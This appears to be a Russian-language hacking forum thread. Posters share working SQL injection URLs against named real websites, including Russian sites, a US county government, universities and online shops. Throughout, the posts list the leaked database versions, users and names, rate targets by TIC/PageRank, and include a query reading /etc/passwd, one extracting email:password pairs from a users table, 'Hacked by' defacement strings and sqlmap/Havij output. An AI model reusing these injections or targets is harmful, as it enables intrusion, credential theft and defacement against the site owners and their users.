Code: http://www.feb.spb.ru/catalog.php?id=-17+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10+from+information_schema.tables+--+ Database:zorro_feb@localhost Version:5.0.51a-24+lenny5-log User:zorro_feb Тиц 60 PR 2 Code: http://www.shery.ru/news/?id=-17+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,4,5,6,7+--+ Database:shery@localhost Version:5.5.15 User:shery Тиц 80 PR 2
торрент портальчик Code: http://baratro.ru/subcat.php?id=22' AND (SELECT 9355 FROM(SELECT COUNT(*),CONCAT(0x3a6476703a,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x3a6c756d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a
Просто забавный сайт. PHP: http://www.bitchslapcountdown.com/index.php?id=-1'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--+
Code: http://www.rundown.com/landing.php?loc=1-99999999.9+union+select+1,2,3,4,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+f
Работа (Индия). Code: http://www.jobs-bank.com/jobdetails.php?jobid=1-1.1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),7,8,9,10-- Database Version: 5.0.86 Database name: chintajobs User name: [email protected] ТИЦ: 0 PR: 3 Бильярд. Code: http://www.azbilliards.com/brackets/show32ls.php?tourneynum=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12,13,14,15,16-- Database Version: 5.5.9 Database name: brackets User name: admin@localhost ТИЦ: 40 PR: 5
co.rice.mn.us PR-5 Code: http://www.co.rice.mn.us/news/newsitem.php?id=-518+union+select+version()||chr(58)||current_user||chr(58)||current_database(),null,null,null,null,null,null,null,null+--+ Code: PostgreSQL 8.3.17 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2:ricecouser:riceco farmington.edu PR-6 Оракл Блайнд Code: http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 87 Code: http://www.farmington.edu/news/release.php?id=3321 AND ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),1,1)) = 69 ... Code: WEBCALENDAR ci.bremerton.wa.us PR-5 Code: www.ci.bremerton.wa.us/display.php?id=96 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14 -- Code: 5.0.51a-3ubuntu5.7:bremcity@localhost:bremcity (вывод в сорце 34я строка)
Code: http://www.6koles-e.ru/inner.php?cid=10&id=-17+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+--+ Тиц 30 PR 3
_http://www.burlingtonshair.com/shop.php?id=2 _http://www.homeshoppingradio.com/category.php?id=26 _http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726
Code: http://www.burlingtonshair.com/shop.php?id=-2'+union+select+1,concat(0x4861636b6564206279204572656565),3--+f http://www.homeshoppingradio.com/category.php?id=26-99999.9+union+select+1,concat(0x4861636b6564206279204572656565),3--+f http://www.scottishmusiccentre.com/db/CART/product_details.php?product_id=5726+and(select+1+from(select+count(*),concat((select+concat(0x4861636b6564206279204572656565,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
artsandscience.usask.ca PR-6 Code: http://artsandscience.usask.ca/biology/news/news.php?newsid=-2334+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,version()||chr(58)||current_user||chr(58)||current_database(),null,null,null,null,null,null,null,null,null+--+ Code: PostgreSQL 9.0.7 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (Gentoo 4.5.3-r2 p1.1, pie-0.4.7) 4.5.3, 64-bit:webuser:webdb communication.northwestern.edu PR-6 Code: http://www.communication.northwestern.edu/news/press_release.php?itemID=155-999.9+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16-- Code: 5.0.77-log:UtopiaUser@localhost:Utopia to14.com PR-3 A-549k Code: www.to14.com/game.php?id=-4d486a30869bd'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17,18,19+--+ Code: 5.0.44-log:to14@localhost:to14
Code: http://www.stroyka74.ru/tenders/-1459768'+union+select+1,2,3,4,5,6,7,8,9,concat(email,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+stroyka74_users+limit+1,1+--+ тИЦ 600 PR 4
Code: http://www.star-book.ru/print.php?id=11+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- User: svertokr_boo@localhost Database: svertokr_book Version: 5.1.56-log
тИЦ - 130, PR - 3. Вывод в теге <title></title>. Version: 5.1.41-log User: [email protected] Database: bdhorse_db тИЦ - 150, PR - 3. Version: 5.1.52 User: us5254a_kv_main@localhost Database: db5254a
На сервере около 30 сайтов средним ТИЦ = 10 каждый, есть и больше. Кто зальется, напишите в ПМ, как раскрыли пути(вечно у меня с ними проблема). Спасибо. PHP: http://world-stamps.info/countryw.php?id_country=-1'+union+select+load_file('/etc/passwd')--+
Ну раз он говорит, что "is vulnerable", почему не раскручивает скулю? Sqlmap: GET parameter 'SECTION_ID' is vulnerable. Do you want to keep testing the others ? [y/N] y sqlmap identified the following injection points with a total of 60 HTTP(s) requ ests: --- Place: GET Parameter: SECTION_ID Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: SECTION_ID=2') AND SLEEP(5) AND ('hJWR'='hJWR --- [13:01:32] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.2.6, Nginx back-end DBMS: MySQL 5.0.11 [13:01:32] [INFO] fetching current database [13:01:32] [INFO] retrieved: current database: None [13:01:37] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap-0. 9\sqlmap\output\www.opin.ru' Havij Selected Column Count is 2 Retying to find string column Retying to find string column Retying to find string column Retying to find string column Retying to find string column Valid String Column is 1 DB Server: unknown Finding current data base Database type was not recognized, Injection Failed!
cta-m.ru 5.0.95-community Яндекс тИЦ (CY) 10 Google PageRank (PR) 1 m-words.ru 5.0.91 Яндекс тИЦ (CY) 10 Google PageRank (PR) 1 inconnect-group.ru 5.0.51a-24+lenny2+spu1-log Яндекс тИЦ (CY) 650 Google PageRank (PR) 5 vgasoft.spb.ru 5.0.91-log Яндекс тИЦ (CY) 40 Google PageRank (PR) 2
PHP: http://shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11-- PHP: http://www.24info.net/sim.php?id=-71+union+select+1,2,3,4,5,6,7,8,concat_ws(0x03a,user(),database(),version())--